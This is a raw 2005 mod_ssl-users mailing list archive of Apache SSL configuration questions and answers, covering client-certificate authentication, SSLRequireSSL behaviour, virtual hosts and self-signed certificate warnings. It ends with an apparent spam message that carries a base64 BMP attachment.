However the browser cannot access the directory. The client is waiting for =
my=20
server until server timeout.
Apaches errror.log (level=3Dinfo) shows

Creating new config (0x5cbfc8) for (null)
[Thu Jun 09 17:28:45 2005] [info] Init: Initializing OpenSSL library
[Thu Jun 09 17:28:45 2005] [info] Init: Seeding PRNG with 144 bytes of
entropy
[Thu Jun 09 17:28:45 2005] [info] Loading certificate & private key of
SSL-aware server
[Thu Jun 09 17:28:45 2005] [info] Init: Generating temporary RSA private
keys (512/1024 bits)
[Thu Jun 09 17:28:45 2005] [info] Init: Generating temporary DH parameters
(512/1024 bits)
[Thu Jun 09 17:28:45 2005] [info] Shared memory session cache initialised
[Thu Jun 09 17:28:45 2005] [info] Init: Initializing (virtual) servers for
SSL
[Thu Jun 09 17:28:45 2005] [info] Configuring server for SSL protocol
[Thu Jun 09 17:28:45 2005] [info] Server: Apache/2.0.53, Interface:
mod_ssl/2.0.53, Library: OpenSSL/0.9.7e
[Thu Jun 09 17:28:46 2005] [notice] Apache/2.0.53 (Linux/SUSE) configured --
resuming normal operations
[Thu Jun 09 17:28:46 2005] [info] Server built: Mar 19 2005 22:42:07
[Thu Jun 09 17:33:46 2005] [info] Connection to child 0 established (server
www.myserver.com:443, client 192.168.0.253)
[Thu Jun 09 17:33:46 2005] [info] Seeding PRNG with 144 bytes of entropy
[Thu Jun 09 17:33:46 2005] [info] Initial (No.1) HTTPS request received for
child 0 (server www.myserver.com:443)
[Thu Jun 09 17:33:46 2005] [info] Requesting connection re-negotiation
[Thu Jun 09 17:33:46 2005] [info] Awaiting re-negotiation handshake
[Thu Jun 09 17:38:46 2005] [error] Re-negotiation handshake failed: Not
accepted by client!?

The other directories of the server can be accessed with SSL without any
problems.
Also the SSLRequireSSL directive doesn=B4t work as expected. I still can ac=
cess=20
that directory without using SSL.

What=B4s wrong?
(I=B4m using a version 2.0.53 apache (mod_ssl builtin) on a SuSE 9.3 64-bit=
=20
system)

Thanks for any helpfull hint

Harry
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 13 09:44:39 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 41AB214D9B4; Mon, 13 Jun 2005 09:44:39 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from natfrord.rzone.de (natfrord.rzone.de [81.169.145.161])
	by master.modssl.org (Postfix) with ESMTP id D6AEA14D9AC
	for ; Mon, 13 Jun 2005 09:44:38 +0200 (CEST)
Received: from bitgully.knitter.privat (p54934286.dip.t-dialin.net [84.147.66.134])
	by post.webmailer.de (8.13.1/8.13.1) with ESMTP id j5D7iaNk026831
	for ; Mon, 13 Jun 2005 09:44:37 +0200 (MEST)
Received: from blechkiste.KNITTER.PRIVAT (blechkiste.KNITTER.PRIVAT [192.168.0.253])
	by bitgully.knitter.privat (Postfix) with ESMTP id 1C5C54A7E8
	for ; Mon, 13 Jun 2005 09:44:44 +0200 (CEST)
From: Harry Knitter 
To: modssl-users@modssl.org
Subject: Re: SSL client authentication
Date: Mon, 13 Jun 2005 09:44:41 +0200
User-Agent: KMail/1.7.1
References: <200506111034.09984.harry@knitter-edv-beratung.de>
In-Reply-To: <200506111034.09984.harry@knitter-edv-beratung.de>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-2"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Message-Id: <200506130944.41635.harry@knitter-edv-beratung.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Harry Knitter 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Am Samstag, 11. Juni 2005 10:34 schrieb Harry Knitter:
> I=B4m trying to setup a system where the client authentication for a spec=
ial
> directory should be done via client certificates. I have set up a CA (usi=
ng=20
> OpenSSL) and the according certificate and key files for the CA the serve=
r=20
> and a client.
> The client browser (Mozilla Firefox) has all certificates necessary.
> My vhost-ssl.conf (based on the standard template file) contains the
> following directory entry
>=20
> 
> =A0=A0=A0=A0=A0=A0=A0=A0SSLVerifyClient=A0require
> =A0=A0=A0=A0=A0=A0=A0=A0SSLVerifyDepth=A0=A01
> =A0=A0=A0=A0=A0=A0=A0=A0SSLRequireSSL
> =A0=A0=A0=A0=A0=A0=A0=A0SSLOptions=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0+FakeB=
asicAuth
> =A0=A0=A0=A0=A0=A0=A0=A0SSLCACertificateFile=A0/etc/apache2/ssl.crt/ca.crt
> =A0=A0=A0=A0=A0=A0=A0=A0SSLCipherSuite=A0HIGH:MEDIUM
> =A0=A0=A0=A0=A0=A0=A0=A0SSLRequire=A0=A0=A0=A0=A0=A0%{SSL_CLIENT_S_DN_O}=
=A0eq=A0"My=A0Organisation"=A0\
> =A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0and=A0%{SSL_C=
LIENT_S_DN_OU}=A0eq=A0"My=A0Department"
> 
>=20
> However the browser cannot access the directory. The client is waiting fo=
r=20
my=20
> server until server timeout.
> Apaches errror.log (level=3Dinfo) shows
>=20
> Creating new config (0x5cbfc8) for (null)
> [Thu Jun 09 17:28:45 2005] [info] Init: Initializing OpenSSL library
> [Thu Jun 09 17:28:45 2005] [info] Init: Seeding PRNG with 144 bytes of
> entropy
> [Thu Jun 09 17:28:45 2005] [info] Loading certificate & private key of
> SSL-aware server
> [Thu Jun 09 17:28:45 2005] [info] Init: Generating temporary RSA private
> keys (512/1024 bits)
> [Thu Jun 09 17:28:45 2005] [info] Init: Generating temporary DH parameters
> (512/1024 bits)
> [Thu Jun 09 17:28:45 2005] [info] Shared memory session cache initialised
> [Thu Jun 09 17:28:45 2005] [info] Init: Initializing (virtual) servers for
> SSL
> [Thu Jun 09 17:28:45 2005] [info] Configuring server for SSL protocol
> [Thu Jun 09 17:28:45 2005] [info] Server: Apache/2.0.53, Interface:
> mod_ssl/2.0.53, Library: OpenSSL/0.9.7e
> [Thu Jun 09 17:28:46 2005] [notice] Apache/2.0.53 (Linux/SUSE) configured=
 --
> resuming normal operations
> [Thu Jun 09 17:28:46 2005] [info] Server built: Mar 19 2005 22:42:07
> [Thu Jun 09 17:33:46 2005] [info] Connection to child 0 established (serv=
er
> www.myserver.com:443, client 192.168.0.253)
> [Thu Jun 09 17:33:46 2005] [info] Seeding PRNG with 144 bytes of entropy
> [Thu Jun 09 17:33:46 2005] [info] Initial (No.1) HTTPS request received f=
or
> child 0 (server www.myserver.com:443)
> [Thu Jun 09 17:33:46 2005] [info] Requesting connection re-negotiation
> [Thu Jun 09 17:33:46 2005] [info] Awaiting re-negotiation handshake
> [Thu Jun 09 17:38:46 2005] [error] Re-negotiation handshake failed: Not
> accepted by client!?
>=20
> The other directories of the server can be accessed with SSL without any
> problems.
> Also the SSLRequireSSL directive doesn=B4t work as expected. I still can=
=20
access=20
> that directory without using SSL.
>=20
> What=B4s wrong?
> (I=B4m using a version 2.0.53 apache (mod_ssl builtin) on a SuSE 9.3 64-b=
it=20
> system)
>=20
> Thanks for any helpfull hint
>=20
> Harry

I=B4ve found the solution!=20
As being always a little paranoid I had created certificates and keys with =
a=20
4096 bit length. This was too much.
After creating new certificates and keys with 2048 bit length. Almost=20
everything works fine.
The only problem remaining is that ordinary http-access to my directory is=
=20
still possible, even if SSLRequireSSL is set.
How can I solve this?

Harry
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 13 09:49:52 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3933F14D9B4; Mon, 13 Jun 2005 09:49:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp-out.fr.clara.net (smtp-out.fr.clara.net [212.43.194.59])
	by master.modssl.org (Postfix) with ESMTP id E152514D9AC
	for ; Mon, 13 Jun 2005 09:49:51 +0200 (CEST)
Received: from [10.0.0.69] (gut75-4-82-235-161-39.fbx.proxad.net [82.235.161.39])
	by smtp-out.fr.clara.net (Postfix) with ESMTP id E6455B0683
	for ; Mon, 13 Jun 2005 09:49:50 +0200 (CEST)
Message-ID: <42AD3A99.7070504@idtect.com>
Date: Mon, 13 Jun 2005 09:49:45 +0200
From: Charles-Edouard Ruault 
User-Agent: Debian Thunderbird 1.0.2 (X11/20050602)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL client authentication
References: <200506111034.09984.harry@knitter-edv-beratung.de> <200506130944.41635.harry@knitter-edv-beratung.de>
In-Reply-To: <200506130944.41635.harry@knitter-edv-beratung.de>
X-Enigmail-Version: 0.91.0.0
Content-Type: text/plain; charset=ISO-8859-2
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Charles-Edouard Ruault 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Harry Knitter wrote:

>Am Samstag, 11. Juni 2005 10:34 schrieb Harry Knitter:
>  
>
>>I´m trying to setup a system where the client authentication for a special
>>directory should be done via client certificates. I have set up a CA (using 
>>OpenSSL) and the according certificate and key files for the CA the server 
>>and a client.
>>The client browser (Mozilla Firefox) has all certificates necessary.
>>My vhost-ssl.conf (based on the standard template file) contains the
>>following directory entry
>>
>>
>>        SSLVerifyClient require
>>        SSLVerifyDepth  1
>>        SSLRequireSSL
>>        SSLOptions           +FakeBasicAuth
>>        SSLCACertificateFile /etc/apache2/ssl.crt/ca.crt
>>        SSLCipherSuite HIGH:MEDIUM
>>        SSLRequire      %{SSL_CLIENT_S_DN_O} eq "My Organisation" \
>>                    and %{SSL_CLIENT_S_DN_OU} eq "My Department"
>>
>>
>>However the browser cannot access the directory. The client is waiting for 
>>    
>>
>my 
>  
>
>>server until server timeout.
>>Apaches errror.log (level=info) shows
>>
>>Creating new config (0x5cbfc8) for (null)
>>[Thu Jun 09 17:28:45 2005] [info] Init: Initializing OpenSSL library
>>[Thu Jun 09 17:28:45 2005] [info] Init: Seeding PRNG with 144 bytes of
>>entropy
>>[Thu Jun 09 17:28:45 2005] [info] Loading certificate & private key of
>>SSL-aware server
>>[Thu Jun 09 17:28:45 2005] [info] Init: Generating temporary RSA private
>>keys (512/1024 bits)
>>[Thu Jun 09 17:28:45 2005] [info] Init: Generating temporary DH parameters
>>(512/1024 bits)
>>[Thu Jun 09 17:28:45 2005] [info] Shared memory session cache initialised
>>[Thu Jun 09 17:28:45 2005] [info] Init: Initializing (virtual) servers for
>>SSL
>>[Thu Jun 09 17:28:45 2005] [info] Configuring server for SSL protocol
>>[Thu Jun 09 17:28:45 2005] [info] Server: Apache/2.0.53, Interface:
>>mod_ssl/2.0.53, Library: OpenSSL/0.9.7e
>>[Thu Jun 09 17:28:46 2005] [notice] Apache/2.0.53 (Linux/SUSE) configured --
>>resuming normal operations
>>[Thu Jun 09 17:28:46 2005] [info] Server built: Mar 19 2005 22:42:07
>>[Thu Jun 09 17:33:46 2005] [info] Connection to child 0 established (server
>>www.myserver.com:443, client 192.168.0.253)
>>[Thu Jun 09 17:33:46 2005] [info] Seeding PRNG with 144 bytes of entropy
>>[Thu Jun 09 17:33:46 2005] [info] Initial (No.1) HTTPS request received for
>>child 0 (server www.myserver.com:443)
>>[Thu Jun 09 17:33:46 2005] [info] Requesting connection re-negotiation
>>[Thu Jun 09 17:33:46 2005] [info] Awaiting re-negotiation handshake
>>[Thu Jun 09 17:38:46 2005] [error] Re-negotiation handshake failed: Not
>>accepted by client!?
>>
>>The other directories of the server can be accessed with SSL without any
>>problems.
>>Also the SSLRequireSSL directive doesn´t work as expected. I still can 
>>    
>>
>access 
>  
>
>>that directory without using SSL.
>>
>>What´s wrong?
>>(I´m using a version 2.0.53 apache (mod_ssl builtin) on a SuSE 9.3 64-bit 
>>system)
>>
>>Thanks for any helpfull hint
>>
>>Harry
>>    
>>
>
>I´ve found the solution! 
>As being always a little paranoid I had created certificates and keys with a 
>4096 bit length. This was too much.
>After creating new certificates and keys with 2048 bit length. Almost 
>everything works fine.
>The only problem remaining is that ordinary http-access to my directory is 
>still possible, even if SSLRequireSSL is set.
>How can I solve this?
>  
>
Well to prevent access in http you should place a deny directive in the
http related part of  your config file.

deny from all


>Harry
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


-- 
Charles-Edouard Ruault
Idtect SA
115 rue Reaumur - 75002, Paris, France
Tel: +33-1-55-34-76-65
Fax: +33-1-55-34-76-75
Web: http://www.idtect.com
GPG key Id C97EDD59

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 13 10:09:05 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7793214D9B4; Mon, 13 Jun 2005 10:09:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from natsmtp00.rzone.de (natsmtp00.rzone.de [81.169.145.165])
	by master.modssl.org (Postfix) with ESMTP id 4058B14D9AC
	for ; Mon, 13 Jun 2005 10:09:02 +0200 (CEST)
Received: from bitgully.knitter.privat (p54934286.dip.t-dialin.net [84.147.66.134])
	by post.webmailer.de (8.13.1/8.13.1) with ESMTP id j5D890RA025900
	for ; Mon, 13 Jun 2005 10:09:01 +0200 (MEST)
Received: from blechkiste.KNITTER.PRIVAT (blechkiste.KNITTER.PRIVAT [192.168.0.253])
	by bitgully.knitter.privat (Postfix) with ESMTP id 596BB3BB9A
	for ; Mon, 13 Jun 2005 10:09:08 +0200 (CEST)
From: Harry Knitter 
To: modssl-users@modssl.org
Subject: Re: SSL client authentication
Date: Mon, 13 Jun 2005 10:09:05 +0200
User-Agent: KMail/1.7.1
References: <200506111034.09984.harry@knitter-edv-beratung.de> <200506130944.41635.harry@knitter-edv-beratung.de> <42AD3A99.7070504@idtect.com>
In-Reply-To: <42AD3A99.7070504@idtect.com>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-2"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200506131009.05754.harry@knitter-edv-beratung.de>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Harry Knitter 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Am Montag, 13. Juni 2005 09:49 schrieb Charles-Edouard Ruault:
> Well to prevent access in http you should place a deny directive in the
> http related part of  your config file.
> 
> deny from all
> 
> 

I think this will be the only solution. However the documentation says:



This directive forbids access unless HTTP over SSL (i.e. HTTPS) is enabled for 
the current connection. This is very handy inside the SSL-enabled virtual 
host or directories for defending against configuration errors that expose 
stuff that should be protected. When this directive is present all requests 
are denied which are not using SSL.


Theredore I believed it would work without any "deny from" entry

Regards

Harry
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 13 20:56:03 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7AEFF14D9B3; Mon, 13 Jun 2005 20:56:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mclean-vscan1.bah.com (mclean-vscan1.bah.com [156.80.3.61])
	by master.modssl.org (Postfix) with ESMTP id E3A1714D993
	for ; Mon, 13 Jun 2005 20:55:59 +0200 (CEST)
Received: from mclean-vscan1.bah.com (mclean-vscan1.bah.com [156.80.3.61])
	by mclean-vscan1.bah.com (8.11.0/8.11.0) with SMTP id j5DItr019741
	for ; Mon, 13 Jun 2005 14:55:53 -0400 (EDT)
Received: from mclnexbh01.resource.ds.bah.com ([156.80.7.151])
 by mclean-vscan1.bah.com (SAVSMTP 3.1.6.45) with SMTP id M2005061314555222321
 for ; Mon, 13 Jun 2005 14:55:53 -0400
Received: from MCLNEXVS07.resource.ds.bah.com ([156.80.7.142]) by mclnexbh01.resource.ds.bah.com with Microsoft SMTPSVC(6.0.3790.211);
	 Mon, 13 Jun 2005 14:55:53 -0400
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: RE: SSL Client Auth with Virtual Hosts
Date: Mon, 13 Jun 2005 14:55:52 -0400
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: SSL Client Auth with Virtual Hosts
Thread-Index: AcVngCX5a7Oe4W2US8GDqfWOTMqh5QIxf/SQ
From: "Hoda Nadeem" 
To: 
X-OriginalArrivalTime: 13 Jun 2005 18:55:53.0631 (UTC) FILETIME=[86328AF0:01C57049]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Hoda Nadeem" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Eckard and All,=20

Does anybody know if there is any work around to get the following
scenario to work?

1 IP Address
2 domain names attached to the same server IP address
2 SSL virtual hosts: 1 with client authentication, 1 without client
authentication

I need to try to avoid using a second IP address for the same server.
Some folks are insisting that there must be a way to get the scenario to
work.

Any help is appreciated,=20

Thanks.=20

Nadeem

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org] On Behalf Of Eckard Wille
Sent: Thursday, June 02, 2005 10:34 AM
To: modssl-users@modssl.org
Subject: Re: SSL Client Auth with Virtual Hosts

Hoda Nadeem schrieb:
> On my setup, client authentication is either on or off globally. I=20
> can't seem to isolate it at the virtual host level.

Exactly.

Take a look at http://www.modssl.org/docs/2.8/ssl_faq.html#vhosts,
use a different IP for your second host and it will work.

Greetings from Germany,
Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 14 00:45:55 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C38CB14D9B4; Tue, 14 Jun 2005 00:45:55 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wproxy.gmail.com (wproxy.gmail.com [64.233.184.193])
	by master.modssl.org (Postfix) with ESMTP id EDD3214D98E
	for ; Tue, 14 Jun 2005 00:45:53 +0200 (CEST)
Received: by wproxy.gmail.com with SMTP id 69so412828wri
        for ; Mon, 13 Jun 2005 15:45:52 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=B6llSbsUhQ0TBra1OmO9Ddwz44X5lOkFkK2eglMIJ1GxdaIOK4QP/K7cvFFdHswtr9FvgufhQnfilMs+xerEv0Mt7bivgXGwQ5Ns2ePkC2o5Wyx8L9yavbrgEY8pn4XUrDJ1jKevudt2oLo5DQczO6QPKhBS8nlahGHsaIp48rw=
Received: by 10.54.57.2 with SMTP id f2mr2564843wra;
        Mon, 13 Jun 2005 15:45:52 -0700 (PDT)
Received: by 10.54.105.15 with HTTP; Mon, 13 Jun 2005 15:45:52 -0700 (PDT)
Message-ID: 
Date: Mon, 13 Jun 2005 18:45:52 -0400
From: BJ Swope 
To: modssl-users@modssl.org
Subject: Internet Explorer Security Warning Using Self Signed Certificates
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: BJ Swope 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

We are using self signed certificates on our Apache server.

Previously we were able to use the

SSLCACertificateFile /conf/apache/trustroots.ber
or
SSLCertificateChainFile /conf/apache/chain.ber

directives to push the chain of certifiers to IE without IE
complaining.  It would read the chain that was pushed with the
certificate and the session would continue.


For the past 6 to 8 months or so Internet Explorer has been throwing
security warnings saying ...

"The security certificate was issued by a company you have not chosen
to trust.  View the certificate to determine whether you want to trust
the certifying authority."


I know this is not a modssl issue.  The directives used to work, and still =
do.

If you leave the directive out of the httpd.conf file, the browser
does not show a certificate chain.  With either directive, the browser
will display the complete chain.

I realize that installing the signing CA into IE's (and Mozilla's for
that matter) CA store will resolve the issue, but that's incredibly
difficult to do across many enterprises.

I suspect that this is an "Anti-Phishing" security change in IE but
cannot find anything related on the web.  I have been googling and
cannot find anybody experiencing an issue similar to this. Has anybody
on this list seen anything akin to this?



BJ
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 14 09:06:38 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DB3EC14D9B3; Tue, 14 Jun 2005 09:06:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailprimary.werum.de (mailprimary.werum.de [62.156.157.73])
	by master.modssl.org (Postfix) with ESMTP id 32C4614D99B
	for ; Tue, 14 Jun 2005 09:06:35 +0200 (CEST)
Received: from werum815.werum.net (mailsmtp2.werum.net [172.20.104.15])
	by mailprimary.werum.de (Postfix) with ESMTP id 977C3F942D
	for ; Tue, 14 Jun 2005 09:08:07 +0200 (CEST)
Received: from localhost (unknown [192.168.1.3])
	by werum815.werum.net (Postfix) with ESMTP id 162B1932A7;
	Tue, 14 Jun 2005 09:06:33 +0200 (CEST)
Received: from werum815.werum.net ([192.168.1.1])
 by localhost (mailclaw.werum.net [192.168.1.3]) (amavisd-new, port 10024)
 with ESMTP id 07512-08; Tue, 14 Jun 2005 09:04:54 +0200 (CEST)
Received: from [172.20.103.158] (werum758.werum.net [172.20.103.158])
	by werum815.werum.net (Postfix) with ESMTP id 72AC4932A5
	for ; Tue, 14 Jun 2005 09:06:29 +0200 (CEST)
Message-ID: <42AE81F2.7090605@werum.de>
Date: Tue, 14 Jun 2005 09:06:26 +0200
From: Eckard Wille 
User-Agent: Mozilla Thunderbird 1.6.2.0c (Windows/20050317)
X-Accept-Language: de, en-US
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSL Client Auth with Virtual Hosts
References: 
In-Reply-To: 
X-Enigmail-Version: 0.89.5.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at werum.net
X-Spam-Status: No, hits=-5.344 tagged_above=-999 required=5 tests=ALL_TRUSTED,
 AWL, BAYES_00
X-Spam-Level: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Eckard Wille 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hoda Nadeem schrieb:
> Eckard and All, 
> 
> Does anybody know if there is any work around to get the following
> scenario to work?
> 
> 1 IP Address
> 2 domain names attached to the same server IP address
> 2 SSL virtual hosts: 1 with client authentication, 1 without client
> authentication
> 
> I need to try to avoid using a second IP address for the same server.
> Some folks are insisting that there must be a way to get the scenario to
> work.

Hi,

maybe you should reach your goal with some mod_rewrite tricks. The 
points mentioned at http://www.modssl.org/docs/2.8/ssl_faq.html#vhosts 
are still valid, only one vhost per ip. You could give mod_rewrite a 
try to push clients to different directories which are configured for 
secure and public ssl access.

Try something like this:

   ServerName www.vhost1.com
   ServerAlias www.vhost2.com

   SSLEngine on
   SSLVerifyClient none
   SSLCACertificateFile conf/ssl.crt/ca.crt

   
     SSLVerifyClient require
     SSLVerifyDepth 1
   

   RewriteEngine on
   #RewriteLogLevel 7
   #RewriteLog  logs/RewriteLog
   #RewriteCond %{SERVER_NAME}
   RewriteCond %{HTTP_HOST}               www.vhost1.com
   RewriteRule ^(/index.htm)|(/)|()$      /ssl/securedir [R,L]

   RewriteCond %{HTTP_HOST}               www.vhost2.com
   RewriteRule ^(/index.htm)|(/)|()$      /ssl/public [R,L]

This would just be a starting switch, modify the regexp to push all 
desired content into the matching secure location (see 
http://www.modssl.org/docs/2.8/ssl_howto.html#ToC6). I personally did 
not try this, but if this does not work maybe mod_setenvif can be used 
to distinguish the different names.

Greetings from Germany,
Eckard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 14 13:11:52 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2B09314D9C3; Tue, 14 Jun 2005 13:11:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from banco.net (200-225-213-153.xf-static.ctbcnetsuper.com.br [200.225.213.153])
	by master.modssl.org (Postfix) with SMTP id E0B6B14D9B3
	for ; Tue, 14 Jun 2005 13:11:48 +0200 (CEST)
Date: Tue, 14 Jun 2005 08:26:53 -0300
To: "Modssl-users" 
From: "Rse" 
Subject: Re:
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------ozlbxzzfktvzyywltuld"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------ozlbxzzfktvzyywltuld
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


>fotoinfo





 :)





----------ozlbxzzfktvzyywltuld
Content-Type: image/bmp; name="mcxzjsrelr.bmp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="mcxzjsrelr.bmp"
Content-ID: 

Qk2mCAAAAAAAADYAAAAoAAAAPAAAABIAAAABABAAAAAAAHAIAAAAAAAAAAAAAAAAAAAAAAAA
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/AAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9/vXcxRgAAKSXWWv9//3//f3NOAAAAAJRS/3//f/9/c04AAAAA
lFL/f/9//3+UUgAAAACUUv9//38pJQAAAAAAAAAAAAD/f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/MUYAAL13GGMAANZa/3/3XgAAGGMYYwAA
1lr/f/deAAAYYxhjAADWWv9/914AABhjnHMAAJRS/3+UUgAAGGP/f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38AACkl
/3/vPQAA/3//fwAA7z3/f+89AAD/f/9/AADvPf9/7z0AAP9//38AAAAA/3/eewAAKSW9d/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//38AAAAA/38AAAAA/3//fwAAAAD/fwAAAAD/f/9/AAAAAP9/AAAAAP9//38AAAAA
/3//fxhjAAApJf9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9/GGMAAHNO/38AAAAA/3//fwAAAAD/fwAAAAD/f/9/AAAAAP9/
AAAAAJxze28AAHNO/3//f/9/MUYAADFG/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
